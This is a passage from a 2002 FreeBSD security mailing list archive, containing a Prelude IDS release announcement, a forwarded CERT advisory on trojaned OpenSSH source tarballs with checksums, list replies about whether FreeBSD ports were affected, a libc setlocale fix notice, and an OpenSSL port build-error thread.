FreeBSD and gets OpenSSH from the source tree or only for people who get OpenSSH via ports? Can you be more specific about your discovery please? -- Peter Leftwich President & Founder Video2Video Services Box 13692, La Jolla, CA, 92039 USA +1-413-403-9555 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 17:35:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 04B3237B400 for ; Thu, 1 Aug 2002 17:35:45 -0700 (PDT) Received: from alph.dyndns.org (ALyon-209-1-10-96.abo.wanadoo.fr [193.251.93.96]) by mx1.FreeBSD.org (Postfix) with ESMTP id 641D943E6A for ; Thu, 1 Aug 2002 17:35:38 -0700 (PDT) (envelope-from yoann@prelude-ids.org) Received: from localhost.localdomain (unknown [127.0.0.1]) by alph (Postfix) with ESMTP id 91BDD1687A; Thu, 1 Aug 2002 20:01:57 +0200 (CEST) Subject: [ANNOUNCEMENT]: Prelude Hybrid IDS suite 0.8.0 released From: Yoann Vandoorselaere To: prelude-user@prelude-ids.org Cc: prelude-devel@prelude-ids.org Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-9qMsoUyut8ZSD3PB4cKn" X-Mailer: Ximian Evolution 1.0.7 Date: 01 Aug 2002 20:01:57 +0200 Message-Id: <1028224917.15453.101.camel@alph> Mime-Version: 1.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=-9qMsoUyut8ZSD3PB4cKn Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Prelude... before the tempest. =3D=3D=3D=3D=3D=3D[ Prelude Hybrid IDS suite 0.8.0 released ]=3D=3D=3D=3D= =3D=3D The Prelude team is pleased to announce the public release of version 0.8.0 of the Prelude Hybrid Intrusion Detection System. ------[ What is Prelude IDS ? ]------ Prelude is a new innovative hybrid intrusion detection system designed to be very modular, distributed, rock solid and fast. Prelude has been started in 1998 as a network intrusion detection system, coded entirely from scratch. Recently the project has evolved towards a fully hybrid intrusion setection system, integrating both=20 network- and host-based intrusion detection techniques.=20 Currently main development platforms are Linux and FreeBSD on x86.=20 It was also tested on Linux on PPC, Alpha, IA-64 (Itanium) and Sparc=20 hardware platforms. It should also work with other *BSD systems.=20 Prelude is licensed under the terms of the GNU General Public License version 2. Prelude website is located at http://www.prelude-ids.org/ ------[ What's new since 0.4.2 ? ]------ Hybrid means that Prelude now acts as both a network IDS and as an host based IDS. To achieve this goal components have been splitted and reorganized to give an even more modular and distributed design. The new components scheme is described in the Documentation section of the Prelude website. The new Prelude release as well as the release notes are available from the Download page. Description of changes since version 0.4.2 is given below for each module. Watch out, here we come. ------[ Prelude IDS 0.8.0 components ]------ *** Libprelude * Description: Prelude Library is a collection of generic functions providing communication between the Prelude Hybrid IDS suite's components. It provides a convenient interface for sending alerts to Prelude Manager with transparent SSL, fail over and replication support, asynchronous events and timer interfaces, abstracted configuration API (hooking at command line, configuration line or wide configuration, available from the Manager) and generic plugin API. By using libprelude, you can easily turn your favorite security program into a Prelude sensor. * Changes since last version: Initial release. Work has been done towards good portability and sharing of functionnality between Prelude Sensors. *** Prelude NIDS * Description: Prelude NIDS is the network-based sensor program part of the Prelude Hybrid IDS suite. It provides network monitoring along with fast pattern matching (Boyer-Moore only currently) in order to detect attacks against your network. It includes advanced mechanisms such as generic signature engine which is able to understand any ruleset as long as there is a dedicated parser (Snort only currently); protocol and detection analysis plugins featuring Telnet, RPC, HTTP and FTP decoding and preprocessors for cross-platform polymorphic shellcodes detection, ARP misuse detection and scanning detection. It completly supports IP fragmentation and TCP segmentation to track connections and detect stateful events. * Changes since last version: TCP stream reassembly (fragroute and stick/snot attacks proof); HTTP IIS unicode and UTF8 support; Polymorphic shellcode detection; TCP/IP checksums; Support latest Snort ruleset; Handles rule rev, content-list, and sid; IDMEF Alert carries more information about the analyzer, alert severity, etc; IDMEF Heartbeat support; Promiscuous mode can be disabled;=20 Proper implementation of the pcap zero copy patch; Avoid polling the captured device when possible; Capture from Linux cooked devices; Ported to *BSD systems, corrected handling memory alignment and endianess issues (works gracefully on non x86 architectures). *** Prelude Manager * Description: Prelude Manager is the main program of the Prelude Hybrid IDS suite. It is a multithreaded server handling connections from the different sensors. It is able to register local or remote sensors, let the operator configure them remotely, receive alerts, store alert in a database or any formats supported by reporting plugins (MySQL, PostgreSQL and simple text plugins currently) thus providing centralized logging and analysis. It also provides relaying capabilities for fail-over and replication. IDMEF standard is used for alert representation. Support for filtering plugins allows you to hook in different places of the Manager to define custom criteria for alert relaying and logging. * Changes since last version: Previously known as Prelude Report Server; High performance sensors server; Thread safe SSL suport; support for PostgreSQL and MySQL databases; support for filtering plugins; relaying between manager; IDMEF compatibility; Ported to *BSD systems, corrected handling memory alignment and endianess issues (works gracefully on non x86 architectures). *** Prelude LML * Description: Prelude LML (Log Monitoring Lackey) is the host-based sensor program being a part of the Prelude Hybrid IDS suite. It can act as a centralized log collector for local or remote systems, or as a simple log analyzer (such as swatch). It can run as a network server listening on syslog port or analyze log files. It supports logfile in the BSD syslog format and is able to analyze any logfile by using the powerful PCRE library. It also can apply logfile specific analysis through plugins such as PAX. The current signature ruleset currently support FreeBSD's IPFW logs, Linux 2.4's NetFilter logs, Cisco and Zyxel routers' logs, GrSecurity's logs, PaX's logs and common unix logfiles. Finally, it sends alert to the Prelude Manager when a suspicous log entry is detected. * Changes since last version: Initial release. *** Prelude PHP Frontend * Description: Prelude PHP Frontend is a web-based administrative console for the Prelude Hybrid IDS suite. It is a collection of PHP scripts based on Apache with mod_php, and with AdoDB and PHPlot libraries. It can access alerts stored in the database using standard SQL requests locally or remotely. Then you can visualize IDMEF alerts and generate charts and statistics. The frontend also provides simple manual forensic analysis and correlation capabilities by using visualization filters. * Changes since last version: Initial release. ------[ Getting the release ]------ Prelude IDS 0.8.0 can be downloaded form our website: http://www.prelude-ids.org/index.php?page=3D12 *** Release files MD5 sums 5295bdd47350cc52a9ff2bd8224a6c3d libprelude-0.8.0.tar.gz 9a37078364e35622ee6378e5efeb870a prelude-lml-0.8.0.tar.gz a4d96266d058d88c47eb539c20004b0f prelude-manager-0.8.0.tar.gz 29763787d403bfd380048b2c82402272 prelude-nids-0.8.0.tar.gz 9ed057651102146e5de36c990474eeff prelude-php-frontend-0.8.0.tar.gz ------[ Credits for this release ]------ * Yoann Vandoorselaere (Main developer / project author - Prelude-NIDS, Prelude-Manager, Prelude-LML, Libprelude) * Gilles Seguin (Prelude PHP Frontend) * Vincent Geay (Prelude PHP Frontend) * Alexandre Launay (Prelude-LML : Prelude Log Monitoring Lackey) * Pierre-Jean Turpeau (Prelude-LML : Prelude Log Monitoring Lackey) * Krzysztof Zaraska (FreeBSD port, bugfixes, Manager debuging plugin) * Sylvain Gil (Makefile / Autoconf subsystem work, Database plugins support) * Laurent Oudot (Tcp Window key support, Database IDMEF support, frontend work) * Vincent Glaume (TCP stream reassembly work, TCP/IP checksum, bugfixes) * Baptiste Malguy (bugfixes, flex work, db work, counter measure work) * Arnaud Guignard (Prelude-LML signature engine work) * Philippe Biondi (Libqsearch implementation) ------[ Contributors ]------ * Yann Droneaud (Autoconf/Automake work, Prelude beta testing and debugging) * Sebastien Tricaud (Prelude FAQ) * Daniel Polombo (Prelude HOWTO, Installation help) * Michael Samuel (Prelude LML conceptual work) ------[ Artwork ]------ * Marchand Thierry (official Prelude artist, logo conceptor) * Odile Darmet (Website) --=20 Yoann Vandoorselaere http://www.prelude-ids.org --=-9qMsoUyut8ZSD3PB4cKn Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQA9SXeV4tfUv0C+vv8RAmOtAJ43zLqTbe+bDO7goE1NhZbDS1wryACdEpGZ iKFr4tUoWSAKGemHofU35PY= =Vb3B -----END PGP SIGNATURE----- --=-9qMsoUyut8ZSD3PB4cKn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18: 0: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 502D837B400; Thu, 1 Aug 2002 17:59:58 -0700 (PDT) Received: from mx.netgate.net (mx.netgate.net [204.145.147.77]) by mx1.FreeBSD.org (Postfix) with ESMTP id E68A143E70; Thu, 1 Aug 2002 17:59:57 -0700 (PDT) (envelope-from ctodd@netgate.net) Received: from rs.netgate.net (rs.netgate.net [204.145.147.55]) by mx.netgate.net (8.9.3/8.9.3) with ESMTP id RAA02569; Thu, 1 Aug 2002 17:59:57 -0700 (PDT) Date: Thu, 1 Aug 2002 17:59:57 -0700 (PDT) From: Chris Miller To: dinoex@FreeBSD.org Cc: freebsd-security@FreeBSD.org Subject: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Are we affected by this? I couldn't find bf-test.c in the openssh directory in /usr/ports. I'm assuming that since the part of the automagic process of building the port involves checking the checksum that we are safe, but I thought it best to ask. Regards, Chris ---------- Forwarded message ---------- Date: Thu, 1 Aug 2002 17:13:46 -0400 From: CERT Advisory To: cert-advisory@cert.org Subject: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution Original issue date: August 1, 2002 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Overview The CERT/CC has received confirmation that some copies of the source code for the OpenSSH package were modified by an intruder and contain a Trojan horse. We strongly encourage sites which employ, redistribute, or mirror the OpenSSH package to immediately verify the integrity of their distribution. I. Description The CERT/CC has received confirmation that some copies of the source code for the OpenSSH package have been modified by an intruder and contain a Trojan horse. The following advisory has been released by the OpenSSH development team http://www.openssh.com/txt/trojan.adv The following files were modified to include the malicious code: openssh-3.4p1.tar.gz openssh-3.4.tgz openssh-3.2.2p1.tar.gz These files appear to have been placed on the FTP server which hosts ftp.openssh.com and ftp.openbsd.org on the 30th or 31st of July, 2002. The OpenSSH development team replaced the Trojan horse copies with the original, uncompromised versions at 13:00 UTC, August 1st, 2002. The Trojan horse copy of the source code was available long enough for copies to propagate to sites that mirror the OpenSSH site. The Trojan horse versions of OpenSSH contain malicious code that is run when the software is compiled. This code connects to a fixed remote server on 6667/tcp. It can then open a shell running as the user who compiled OpenSSH. II. Impact An intruder operating from (or able to impersonate) the remote address specified in the malicious code can gain unauthorized remote access to any host which compiled a version of OpenSSH from this Trojan horse version of the source code. The level of access would be that of the user who compiled the source code. III. Solution We encourage sites who downloaded a copy of the OpenSSH distribution to verify the authenticity of their distribution, regardless of where it was obtained. Furthermore, we encourage users to inspect any and all software that may have been downloaded from the compromised site. Note that it is not sufficient to rely on the timestamps or sizes of the file when trying to determine whether or not you have a copy of the Trojan horse version. Where to get OpenSSH The primary distribution site for OpenSSH is http://www.openssh.com/ Sites that mirror the OpenSSH source code are encouraged to verify the integrity of their sources. Verify MD5 checksums You can use the following MD5 checksums to verify the integrity of your OpenSSH source code distribution: Correct versions: 459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz d5a956263287e7fd261528bb1962f24c openssh-3.4p1.tar.gz.sig 39659226ff5b0d16d0290b21f67c46f2 openssh-3.4.tgz 9d3e1e31e8d6cdbfa3036cb183aa4a01 openssh-3.2.2p1.tar.gz be4f9ed8da1735efd770dc8fa2bb808a openssh-3.2.2p1.tar.gz.sig At least one version of the modified Trojan horse distributions was reported to have the following checksum: Trojan horse version: 3ac9bc346d736b4a51d676faa2a08a57 openssh-3.4p1.tar.gz Verify PGP signature Additionally, distributions of the portable release of OpenSSH are distributed with detached PGP signatures. Note that the Trojan horse versions were not signed correctly, and attempts to verify the signatures would have failed. As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software. For more information, see http://www.cert.org/incident_notes/IN-2001-06.html Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Connectiva Linux Conectiva Linux distributes openssh-3.4p1 as a security update. The distributed copy is the original one and is not affected by this trojan. The detached digital signature is always checked before building third party packages. MandrakeSoft MandrakeSoft has verified that the openssh-3.4p1 sources used to build it's latest updates (ref. MDKSA-2002:040-1) do not contain this trojan. _________________________________________________________________ _________________________________________________________________ Feedback can be directed to the author: Chad Dougherty. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-24.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History August 1, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPUmR3qCVPMXQI2HJAQFs7wP/SwypiZbfCb/FvMBgE3rFaY9Ul7vlyRKE KPncunJ+KVp2sBzTbNL01wOuASx836hTa/ByXwnX4LQLX0XzBLrDcVsrDlu1pUga Z/CopXb3KclKckmti5diCz1BNQdKbYyu/G7uHkjZQPJKC6UZr9lmge+00HMqSmHN AAOV7PQstAc= =FgfD -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18: 2:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 92D3337B400; Thu, 1 Aug 2002 18:02:33 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2337E43E5E; Thu, 1 Aug 2002 18:02:33 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id C1D37535E; Fri, 2 Aug 2002 03:02:29 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Chris Miller Cc: dinoex@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution (fwd) References: From: Dag-Erling Smorgrav Date: 02 Aug 2002 03:02:28 +0200 In-Reply-To: Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Chris Miller writes: > Are we affected by this? I couldn't find bf-test.c in the openssh > directory in /usr/ports. I'm assuming that since the part of the automagic > process of building the port involves checking the checksum that we are > safe, but I thought it best to ask. We're safe. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18: 7:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1434A37B400 for ; Thu, 1 Aug 2002 18:07:34 -0700 (PDT) Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by mx1.FreeBSD.org (Postfix) with SMTP id 6567143E4A for ; Thu, 1 Aug 2002 18:07:33 -0700 (PDT) (envelope-from yid@softhome.net) Received: (qmail 28943 invoked by uid 417); 2 Aug 2002 01:07:28 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 2 Aug 2002 01:07:28 -0000 Received: from unknown ([216.194.6.221]) (AUTH: LOGIN yid@softhome.net) by softhome.net with esmtp; Thu, 01 Aug 2002 19:07:25 -0600 Date: Thu, 1 Aug 2002 21:05:56 -0400 From: Joshua Lee To: "DiCioccio, Jason" Cc: bond@comitnet.se, freebsd-security@FreeBSD.ORG Subject: Re: Trojan located in latest openssh tar files Message-Id: <20020801210556.04b0fee1.yid@softhome.net> In-Reply-To: <657B20E93E93D4118F9700D0B73CE3EA02FFF649@goofy.epylon.lan> References: <657B20E93E93D4118F9700D0B73CE3EA02FFF649@goofy.epylon.lan> Organization: Plan B Software Labs X-Mailer: Sylpheed version 0.8.0claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002 16:58:14 -0700 "DiCioccio, Jason" wrote: > Neither -- unless you tell it to ignore the checksum on the port. As > far as the source tree, OpenSSH 3.4 was imported a while back, so I > don't think the same problem would exist as the trojan seemed to > originate yesterday. Yes, and to come to think of it since it requires the cooperation of a makefile, unless the source tree uses the makefile of the original package there's no hole for the source tree's openssh. Thanks for the help. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18:12:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 695FD37B400 for ; Thu, 1 Aug 2002 18:12:34 -0700 (PDT) Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6E83A43E7B for ; Thu, 1 Aug 2002 18:12:33 -0700 (PDT) (envelope-from ache@pobrecita.freebsd.ru) Received: from pobrecita.freebsd.ru (ache@localhost [127.0.0.1]) by nagual.pp.ru (8.12.5/8.12.5) with ESMTP id g721CSDG006483 for ; Fri, 2 Aug 2002 05:12:30 +0400 (MSD) (envelope-from ache@pobrecita.freebsd.ru) Received: (from ache@localhost) by pobrecita.freebsd.ru (8.12.5/8.12.5/Submit) id g721CRAJ006482 for security@freebsd.org; Fri, 2 Aug 2002 05:12:27 +0400 (MSD) (envelope-from ache) Date: Fri, 2 Aug 2002 05:12:26 +0400 From: "Andrey A. Chernov" To: security@freebsd.org Subject: [ache@FreeBSD.org: cvs commit: src/lib/libc/locale setlocale.c] Message-ID: <20020802011225.GA6411@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please fill security advisory for this fix (first part). That original BSD code bug can be exploitable. ----- Forwarded message from "Andrey A. Chernov" ----- Date: Thu, 1 Aug 2002 18:04:49 -0700 (PDT) From: "Andrey A. Chernov" Subject: cvs commit: src/lib/libc/locale setlocale.c To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org ache 2002/08/01 18:04:49 PDT Modified files: lib/libc/locale setlocale.c Log: Prevent out of bounds writting for too many slashes case. Replace strnpy + ='\0' with strlcpy MFC after: 1 day Revision Changes Path 1.35 +10 -14 src/lib/libc/locale/setlocale.c ----- End forwarded message ----- -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 20:12: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 401B037B400 for ; Thu, 1 Aug 2002 20:12:01 -0700 (PDT) Received: from switchblade.cyberpunkz.org (switchblade.cyberpunkz.org [198.174.169.125]) by mx1.FreeBSD.org (Postfix) with ESMTP id A342543E42 for ; Thu, 1 Aug 2002 20:12:00 -0700 (PDT) (envelope-from rob@switchblade.cyberpunkz.org) Received: from switchblade.cyberpunkz.org (rob@localhost [127.0.0.1]) by switchblade.cyberpunkz.org (8.12.5/8.12.3) with ESMTP id g723Bsge088934 for ; Thu, 1 Aug 2002 23:11:59 -0400 (EDT) (envelope-from rob@switchblade.cyberpunkz.org) Posted-Date: Thu, 1 Aug 2002 23:11:59 -0400 (EDT) Received: (from rob@localhost) by switchblade.cyberpunkz.org (8.12.5/8.12.3/Submit) id g723BriN085947 for freebsd-security@FreeBSD.ORG; Thu, 1 Aug 2002 23:11:53 -0400 (EDT)?g (envelope-from rob) Date: Thu, 1 Aug 2002 23:11:53 -0400 From: Rob Andrews To: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution (fwd) Message-ID: <20020802031153.GB74929@switchblade.cyberpunkz.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="zYM0uCDKw75PZbzx" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --zYM0uCDKw75PZbzx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable =2E- - - - - - Dag-Erling Smorgrav wrote (2002/08/01 at 09:02:48 PM) - - - = - - - | |> Chris Miller writes: |> > Are we affected by this? I couldn't find bf-test.c in the openssh |> > directory in /usr/ports. I'm assuming that since the part of the autom= agic |> > process of building the port involves checking the checksum that we are |> > safe, but I thought it best to ask. |>=20 |> We're safe. |>=20 Technically, yes provided system maintainers did not install openssh during the time period the trojaned tarballs were available and didn't decide to force the software to install on the system when the md5 checksum failed to match. During the period openssh was trojaned I was doing system upgrades and rebuilding openssh as well with updated libraries. As a rule I never force software to install if the md5 checksum fails.. Some people ignore this and install anyway. -- Rob Andrews RELI Networks, Inc. --zYM0uCDKw75PZbzx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Sfh5AXwJ9YLqJJURAlxzAJ42O1XrGfXZpoFH3BCfJ3jbWostxgCfS4oG u2GukH1r6AQpOgFyk9M7fQU= =0wQ9 -----END PGP SIGNATURE----- --zYM0uCDKw75PZbzx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 20:49:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4B81537B400 for ; Thu, 1 Aug 2002 20:49:18 -0700 (PDT) Received: from hackmania.net (hssxsk206-163-232-166.sasknet.sk.ca [206.163.232.166]) by mx1.FreeBSD.org (Postfix) with ESMTP id 465CA43E5E for ; Thu, 1 Aug 2002 20:49:17 -0700 (PDT) (envelope-from normal@hackmania.ath.cx) Received: from effortnix (hssxsk206-163-232-165.sasknet.sk.ca [206.163.232.165]) by hackmania.net (8.12.5/8.12.5) with SMTP id g723PBcf000612 for ; Thu, 1 Aug 2002 21:25:11 -0600 (CST) Message-ID: <001101c239d7$7c9d4a30$a5e8a3ce@effortnix> From: "normal" To: References: <200208011205.04188.gobinau@digitalcelt.com> Subject: Re: openssl build Date: Thu, 1 Aug 2002 21:48:38 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yeah, I've run into this problem too :-( I ended up with 50 extra symlinks (i installed a new perl, it ended going into /usr/local when openssl was looking in /usr), I just copied all the binaries to where they belong. I'm sure more people will/have run into this problem. Any ideas besides mine will be great. http://www.hackmania.net - ----- Original Message ----- From: "Reuben A. Popp" To: Sent: Thursday, August 01, 2002 11:04 AM Subject: openssl build > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi all, > > I've run into a small conundrum, while building the recent port of > openssl ((openssl-0.9.6e). It appears that the build works fine, > except to the point where it begins to install the man pages. The > following is my error snippet. This box is running 4.6-STABLE if > that helps any. And now, the snippet: > > making all in apps... > making all in test... > making all in tools... > created directory `/usr/openssl' > created directory `/usr/openssl/man' > created directory `/usr/openssl/man/man1' > created directory `/usr/openssl/man/man3' > created directory `/usr/openssl/man/man5' > created directory `/usr/openssl/man/man7' > installing man1/CA.pl.1 > /usr/bin/pod2man does not work properly ('MultilineTest' failed). > Looking for another pod2man ... > Can't locate Pod/Man.pm in @INC (@INC contains: > /usr/local/lib/perl5/site_perl/5.005/i386-freebsd > /usr/local/lib/perl5/site_perl/5.005 . > /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503) at > /usr/local/bin/pod2man line 16. > BEGIN failed--compilation aborted at /usr/local/bin/pod2man line > 16. *** Error code 2 > > Stop in /usr/ports/security/openssl/work/openssl-0.9.6e. > *** Error code 1 > > Stop in /usr/ports/security/openssl. > [gobinau@www (/usr/ports/security/openssl)] (10:32:56)# > > Thanks in advance for any insight/suggestions :D > > .. > With threats of gas and rose motif > Their lips apart like a swollen rose > Their tongues extend, and then retract > A redcap, a redcap, before the kiss, before the kiss. > .. > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.7 (FreeBSD) > > iD8DBQE9SWo3l5MJ0L8ObVoRAup5AJsHGVLDKehkJudCiBl53xDUOHvx6wCfX74A > 1aiKX2B72BJHpzK2J2nkuNY= > =Pnek > -----END PGP SIGNATURE----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use Comment: https://www.hackmania.ath.cx iQA/AwUBPUoBEmuqlDKIknpUEQIkQACg/c1BULmLdRO04ddC1I8vk9Q83ocAnjBK rJCw8wvnb1GcWXjIt+HMQnit =2rds -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 20:58:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7816D37B401 for ; Thu, 1 Aug 2002 20:58:23 -0700 (PDT) Received: from hackmania.net (hssxsk206-163-232-166.sasknet.sk.ca [206.163.232.166]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2F49043E72 for ; Thu, 1 Aug 2002 20:56:02 -0700 (PDT) (envelope-from normal@hackmania.ath.cx) Received: from effortnix (hssxsk206-163-232-165.sasknet.sk.ca [206.163.232.165]) by hackmania.net (8.12.5/8.12.5) with SMTP id g723VFcf000767; Thu, 1 Aug 2002 21:31:15 -0600 (CST) Message-ID: <002301c239d8$559236c0$a5e8a3ce@effortnix> From: "normal" To: , , "Christopher Schulte" References: <5.1.1.6.2.20020801120928.044f1d88@localhost> Subject: Re: openssl build Date: Thu, 1 Aug 2002 21:54:42 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yeah, after doing what Mr. Schulte said I get "Can't Locate 